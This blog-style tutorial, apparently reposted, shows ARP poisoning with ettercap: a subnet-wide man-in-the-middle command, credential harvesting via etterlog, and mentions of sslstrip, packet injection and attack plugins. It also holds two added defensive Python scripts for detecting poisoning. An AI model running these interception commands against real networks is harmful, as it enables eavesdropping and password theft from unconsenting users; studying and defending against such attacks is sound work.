
Using ettercap for ARP poisoning

程序员文章站 2022-03-19 10:08:21

Ettercap is certainly nothing new, and there is plenty of documentation around to see how to use it, but I was sitting here goofing around and decided to record my results. I am not advocating this type of thing on a public network, and ARP poisoning or other attacks often fall afoul of terms of service for public and private networks, and may even be illegal in some jurisdictions.

First, I looked at my default route.

$ route -n
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
10.71.0.0       0.0.0.0         255.255.255.0   U     2      0        0 wlan0
0.0.0.0         10.71.0.1       0.0.0.0         UG    0      0        0 wlan0

To sniff the whole subnet, I’ll want to do some ARP poisoning to send all traffic to/from the default route through my system.

$ sudo ettercap -i wlan0 -T -M arp:remote /10.71.0.1/ //

You can also use “// //” to designate ARP poisoning no matter what source and destination ettercap sees. The “-T” tells ettercap to use the text interface, which is still interactive. There is also a curses-based interface, “-C”, and a GTK interface, “-G”, though the GTK one has always seemed less reliable to me than the others. The curses interface is actually pretty nice.

Once you run the command, ettercap should enumerate hosts and you will start seeing a bunch of traffic information scrolling through your console. How do we know if it’s actually working? If you see non-broadcast traffic destined for other hosts, it will be obvious and you will know you’re successfully sniffing all the traffic.

Another fun way is by opening etherape to see a realtime visualization of the traffic. If you are seeing typical non-broadcast traffic like HTTP or HTTPS, that’s an indicator that you’re successfully ARP poisoning. You can also quickly see whether particular hosts are generating a lot of traffic. I’ve seen the typical sites like Facebook, Amazon, Akamai, and LLNW, but also more interesting sites that are easily identifiable as VPN concentrators, banks, and more.
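The replies that make the attack above work, an ARP reply claiming the gateway’s address with a different hardware address, are also exactly what a defender’s monitor sees on the wire, and it is what the arp_cop plugin listed later reports from ettercap’s own side. The following is an added example, not code from the original post or from the ettercap project: a small Python monitor that decodes raw Ethernet/ARP frames with struct (no scapy dependency), keeps an IP-to-MAC table, and flags a known address being claimed by a new MAC as well as replies for which no request was seen. The frames and addresses are constructed sample data on the post’s 10.71.0.0/24 subnet (gateway, victim and attacker MACs are made up), and the ArpMonitor, parse_arp and build_arp names are this example’s own; feeding it live frames from a raw socket or a pcap reader is left to the caller.

```python
"""Minimal ARP poisoning monitor (added example; not ettercap's code).

Decodes Ethernet II + ARP frames by hand and keeps an IP -> MAC table.
Two conditions are reported:
  * a known IP (e.g. the gateway) suddenly claimed by a different MAC
  * an ARP reply for which no matching request was observed
Gratuitous ARP after a legitimate interface change can also trigger the
second check, so treat it as a hint; the first check is the strong signal.
"""
import struct
from dataclasses import dataclass
from typing import Dict, List, Optional

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST = "ff:ff:ff:ff:ff:ff"


@dataclass
class ArpPacket:
    op: int
    sender_mac: str
    sender_ip: str
    target_mac: str
    target_ip: str


def _mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def _ip(b: bytes) -> str:
    return ".".join(str(x) for x in b)


def parse_arp(frame: bytes) -> Optional[ArpPacket]:
    """Decode an IPv4-over-Ethernet ARP frame; return None for anything else."""
    if len(frame) < 42:  # 14-byte Ethernet header + 28-byte ARP body
        return None
    if struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    sha, spa, tha, tpa = struct.unpack("!6s4s6s4s", frame[22:42])
    return ArpPacket(op, _mac(sha), _ip(spa), _mac(tha), _ip(tpa))


class ArpMonitor:
    def __init__(self, trusted: Optional[Dict[str, str]] = None) -> None:
        # Operator-supplied bindings to defend (assumption: at least the gateway).
        self.bindings: Dict[str, str] = dict(trusted or {})
        self.pending = set()  # (asker_ip, asked_ip) for requests not yet answered
        self.alerts: List[str] = []

    def feed(self, frame: bytes) -> Optional[ArpPacket]:
        pkt = parse_arp(frame)
        if pkt is None:
            return None
        if pkt.op == ARP_REQUEST:
            self.pending.add((pkt.sender_ip, pkt.target_ip))
        elif pkt.op == ARP_REPLY:
            key = (pkt.target_ip, pkt.sender_ip)
            if key in self.pending:
                self.pending.discard(key)
            else:
                self.alerts.append(
                    f"unsolicited reply: {pkt.sender_ip} is-at {pkt.sender_mac} (to {pkt.target_ip})")
            known = self.bindings.get(pkt.sender_ip)
            if known is None:
                self.bindings[pkt.sender_ip] = pkt.sender_mac  # first sighting: learn it
            elif known != pkt.sender_mac:
                self.alerts.append(
                    f"binding change: {pkt.sender_ip} was {known}, now claimed by {pkt.sender_mac}")
        return pkt


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip, dst_mac=None) -> bytes:
    """Serialize an ARP frame. Used here only to construct sample input for the monitor."""
    def mac_b(s):
        return bytes(int(x, 16) for x in s.split(":"))

    def ip_b(s):
        return bytes(int(x) for x in s.split("."))
    eth = mac_b(dst_mac or target_mac) + mac_b(sender_mac) + struct.pack("!H", ETH_P_ARP)
    body = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)
    body += mac_b(sender_mac) + ip_b(sender_ip) + mac_b(target_mac) + ip_b(target_ip)
    return eth + body


# Constructed sample addresses (made up, on the post's 10.71.0.0/24 subnet).
GW_IP, GW_MAC = "10.71.0.1", "00:11:22:33:44:01"
VICTIM_IP, VICTIM_MAC = "10.71.0.55", "00:11:22:33:44:55"
ATTACKER_MAC = "00:11:22:33:44:99"


def run_sample() -> List[str]:
    """Replay constructed frames and return the alerts the monitor raised."""
    mon = ArpMonitor(trusted={GW_IP: GW_MAC})
    mon.feed(build_arp(ARP_REQUEST, VICTIM_MAC, VICTIM_IP, "00:00:00:00:00:00", GW_IP, dst_mac=BROADCAST))
    mon.feed(build_arp(ARP_REPLY, GW_MAC, GW_IP, VICTIM_MAC, VICTIM_IP))        # legitimate answer
    mon.feed(build_arp(ARP_REPLY, ATTACKER_MAC, GW_IP, VICTIM_MAC, VICTIM_IP))  # poisoned answer
    mon.feed(b"\x00" * 12 + b"\x08\x00" + b"\x00" * 40)                         # non-ARP frame, ignored
    return mon.alerts


if __name__ == "__main__":
    for line in run_sample():
        print(line)
```

The poisoned reply produces two alerts: it answers a question nobody asked, and it moves 10.71.0.1 from the trusted gateway MAC to another one. On a real segment, seed `trusted` from a capture taken when the network was known-good and ignore the unsolicited-reply alert for hosts that legitimately send gratuitous ARP.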

You can also, of course, use various tools, including ettercap with the “-w” option, to write traffic to a file and review it at your leisure to look for interesting data. Ettercap also has an interesting utility to automatically grab usernames and passwords. From the man page:

-L, --log
Log all the packets to binary files. These files can be parsed
by etterlog(8) to extract human readable data. With this option,
all packets sniffed by ettercap will be logged, together with
all the passive info (host info + user & pass) it can collect.
Given a LOGFILE, ettercap will create LOGFILE.ecp (for packets)
and LOGFILE.eci (for the infos).

If you didn’t run this with ettercap originally, you can also run it on a saved packet capture.

$ ettercap -r hotel.raw -L hotel
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Please select an User Interface

$ ls hotel*
hotel.eci  hotel.ecp  hotel.raw

$ etterlog -a hotel.eci
etterlog NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Log file version    : NG-0.7.3
Timestamp           : Wed Feb 16 14:20:57 2010
Type                : LOG_INFO

Number of hosts (total)       : 248

Number of local hosts         : 30
Number of non local hosts     : 0
Number of gateway             : 0

Number of discovered services : 240
Number of accounts captured   : 4

$ etterlog -p hotel.eci
74.125.93.191   TCP 80     USER: fakeuser      PASS: fakepasswd

I changed the data above, and of course most sites these days are hopefully forcing encrypted logins.

These days, many sites can be hosted on one IP or virtual server. If you’re not catching the DNS or HTTP request specifically before the login that was captured, the easiest way to determine which site on a specific IP was being visited would be opening up the packet capture with a tool like Wireshark, using a filter for the IP, then looking at the actual web traffic for the site’s name. Looking in Wireshark, I can see the GET immediately after the TCP handshake.

GET /members/bbs/showthread.php HTTP/1.1
Host: www.fakedomain.com

This really just scratches the surface of what you can do with ettercap and other network tools. ARP poisoning still works, particularly on public networks, and many people log in to many services that can be easily compromised through sniffing (I write while sitting in an airport on public WiFi logged into my blogger account). A relatively recent high-profile example was when the Metasploit site was briefly hijacked by successful ARP poisoning.

There are numerous other attacks besides sniffing that could succeed when ARP poisoning, many involving redirecting traffic or injecting malicious content. For instance, you can use something like sslstrip to redirect all HTTPS traffic to HTTP, grabbing credentials in the process. You could also inject content directly using etterfilter.

DESCRIPTION
The etterfilter utility is used to compile source filter files into
binary filter files that can be interpreted by the JIT interpreter in
the ettercap(8) filter engine. You have to compile your filter scripts
in order to use them in ettercap. All syntax/parse errors will be
checked at compile time, so you will be sure to produce a correct
binary filter for ettercap.


[image: Using ettercap for ARP poisoning]

Using etterfilter you can inject new packets, replace data in packets, and more. If someone is visiting what they consider a known safe site, replacing data or injecting malicious packets can be quite successful. At a previous job, we had a non-production network for attack and defend fun, and with etterfilter I was able to replace all image requests from one of my colleagues’ browsers so that it requested the image to the left instead.

Although my example above is obviously on a wireless network as shown by using the wlan0 interface, you can easily perform ARP poisoning on a local wired segment. There are also a number of ways to help detect or prevent poisoning with your network appliances or software.
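On the host itself, the cheapest of those detection and prevention options is the neighbor cache: after a poisoning run like the one above, the gateway’s IP resolves to the attacker’s MAC, so one MAC shows up against two IPs, and the gateway no longer matches the MAC recorded when the LAN was known-good. The following is an added example (not from the post or the ettercap project) that parses `ip neigh show` output, reports that pattern, and produces the iproute2 command that pins the gateway entry as a static (permanent) neighbor so spoofed replies no longer overwrite it. The table, the MACs and the known-good gateway MAC are constructed sample data; parse_ip_neigh, audit and pin_command are this example’s own names.

```python
"""Host-side audit of the ARP/neighbor cache (added example; not ettercap's code).

Reads the text produced by `ip neigh show`, then reports
  * one MAC answering for several IPs (the gateway among them is the classic
    poisoning footprint, since the attacker's NIC now "owns" the gateway's IP)
  * the gateway resolving to a MAC other than the one recorded when the
    network was known-good
and builds the iproute2 command that pins the gateway binding as mitigation.
Legitimate setups (VRRP/HSRP, proxy ARP) can also map one MAC to many IPs,
so the duplicate check is a prompt to look, not proof on its own.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class Neighbor:
    ip: str
    dev: str
    mac: Optional[str]  # None for FAILED/INCOMPLETE entries that carry no lladdr
    state: str


def parse_ip_neigh(text: str) -> List[Neighbor]:
    """Parse lines such as '10.71.0.1 dev wlan0 lladdr 00:11:22:33:44:01 REACHABLE'."""
    out = []
    for line in text.splitlines():
        toks = line.split()
        if len(toks) < 3 or toks[1] != "dev":
            continue
        mac = toks[toks.index("lladdr") + 1].lower() if "lladdr" in toks else None
        state = toks[-1] if toks[-1].isupper() else "UNKNOWN"
        out.append(Neighbor(toks[0], toks[2], mac, state))
    return out


def audit(neighbors: List[Neighbor], gateway_ip: str,
          expected_gateway_mac: Optional[str] = None) -> List[str]:
    """Return human-readable findings; an empty list means nothing suspicious."""
    findings = []
    by_mac: Dict[str, List[str]] = defaultdict(list)
    for n in neighbors:
        if n.mac:
            by_mac[n.mac].append(n.ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            sev = "HIGH" if gateway_ip in ips else "LOW"
            findings.append(f"{sev}: {mac} answers for {len(ips)} addresses: {', '.join(ips)}")
    gw = next((n for n in neighbors if n.ip == gateway_ip), None)
    if gw is None or gw.mac is None:
        findings.append(f"INFO: no resolved entry for gateway {gateway_ip}")
    elif expected_gateway_mac and gw.mac != expected_gateway_mac.lower():
        findings.append(f"HIGH: gateway {gateway_ip} is {gw.mac}, expected {expected_gateway_mac}")
    return findings


def pin_command(gateway_ip: str, mac: str, dev: str) -> str:
    """iproute2 command that makes the gateway entry static, so ARP replies cannot change it."""
    return f"ip neigh replace {gateway_ip} lladdr {mac} dev {dev} nud permanent"


# Constructed sample output of `ip neigh show` on the post's subnet; the MACs are made up.
SAMPLE_NEIGH = """\
10.71.0.1 dev wlan0 lladdr 00:11:22:33:44:99 REACHABLE
10.71.0.55 dev wlan0 lladdr 00:11:22:33:44:55 STALE
10.71.0.99 dev wlan0 lladdr 00:11:22:33:44:99 REACHABLE
10.71.0.77 dev wlan0  FAILED
"""
KNOWN_GOOD_GW_MAC = "00:11:22:33:44:01"  # recorded earlier, while the LAN was trusted


def run_sample() -> List[str]:
    """Audit the constructed table against the known-good gateway MAC."""
    return audit(parse_ip_neigh(SAMPLE_NEIGH), "10.71.0.1", KNOWN_GOOD_GW_MAC)


if __name__ == "__main__":
    for finding in run_sample():
        print(finding)
    print("mitigation:", pin_command("10.71.0.1", KNOWN_GOOD_GW_MAC, "wlan0"))
```

Run it periodically (or from a cron job that pipes `ip neigh show` into parse_ip_neigh) and the two HIGH findings appear as soon as the gateway entry is overwritten; the permanent entry from pin_command is the host-side counterpart of the switch-side protections (dynamic ARP inspection, port security) the post alludes to, and it has to be re-applied if the real gateway hardware ever changes.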

Finally, ettercap also has a number of interesting plugins available.

$ ettercap -P list
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Available plugins :

arp_cop  1.1  Report suspicious ARP activity
autoadd  1.2  Automatically add new victims in the target range
chk_poison  1.1  Check if the poisoning had success
dns_spoof  1.1  Sends spoofed dns replies
dos_attack  1.0  Run a d.o.s. attack against an IP address
dummy  3.0  A plugin template (for developers)
find_conn  1.0  Search connections on a switched LAN
find_ettercap  2.0  Try to find ettercap activity
find_ip  1.0  Search an unused IP address in the subnet
finger  1.6  Fingerprint a remote host
finger_submit  1.0  Submit a fingerprint to ettercap’s website
gre_relay  1.0  Tunnel broker for redirected GRE tunnels
gw_discover  1.0  Try to find the LAN gateway
isolate  1.0  Isolate an host from the lan
link_type  1.0  Check the link type (hub/switch)
pptp_chapms1  1.0  PPTP: Forces chapms-v1 from chapms-v2
pptp_clear  1.0  PPTP: Tries to force cleartext tunnel
pptp_pap  1.0  PPTP: Forces PAP authentication
pptp_reneg  1.0  PPTP: Forces tunnel re-negotiation
rand_flood  1.0  Flood the LAN with random MAC addresses
remote_browser  1.2  Sends visited URLs to the browser
reply_arp  1.0  Simple arp responder
repoison_arp  1.0  Repoison after broadcast ARP
scan_poisoner  1.0  Actively search other poisoners
search_promisc  1.2  Search promisc NICs in the LAN
smb_clear  1.0  Tries to force SMB cleartext auth
smb_down  1.0  Tries to force SMB to not use NTLM2 key auth
stp_mangler  1.0  Become root of a switches spanning tree